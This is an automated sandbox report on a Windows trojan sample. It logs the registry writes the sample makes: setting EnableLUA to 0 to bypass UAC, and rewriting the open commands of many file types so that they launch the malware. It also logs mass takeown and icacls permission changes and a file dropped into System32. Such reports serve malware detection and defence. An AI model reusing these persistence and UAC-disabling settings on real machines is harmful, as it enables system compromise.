Malware Analysis Report

2024-12-07 14:48

Sample ID 241010-s5t72stanb
Target adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N
SHA256 adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77
Tags
defense_evasion discovery evasion exploit persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77

Threat Level: Known bad

The file adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion exploit persistence trojan

UAC bypass

Possible privilege escalation attempt

Disables Task Manager via registry modification

Modifies system executable filetype association

Modifies file permissions

Checks computer location settings

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: GetForegroundWindowSpam

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-10 15:42

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-10 15:42

Reported

2024-10-10 15:45

Platform

win7-20240903-en

Max time kernel

150s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe BATCF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\stordiag.exe C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
File created C:\Windows\System32\stordiag.exe C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe HTMWF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe JPGIF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe BATCF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe JPGIF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe JPGIF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe VBSSF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe CMDSF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe JPGIF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe RTFDF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 2084 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 2084 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 2084 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 2084 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 2084 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 2084 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
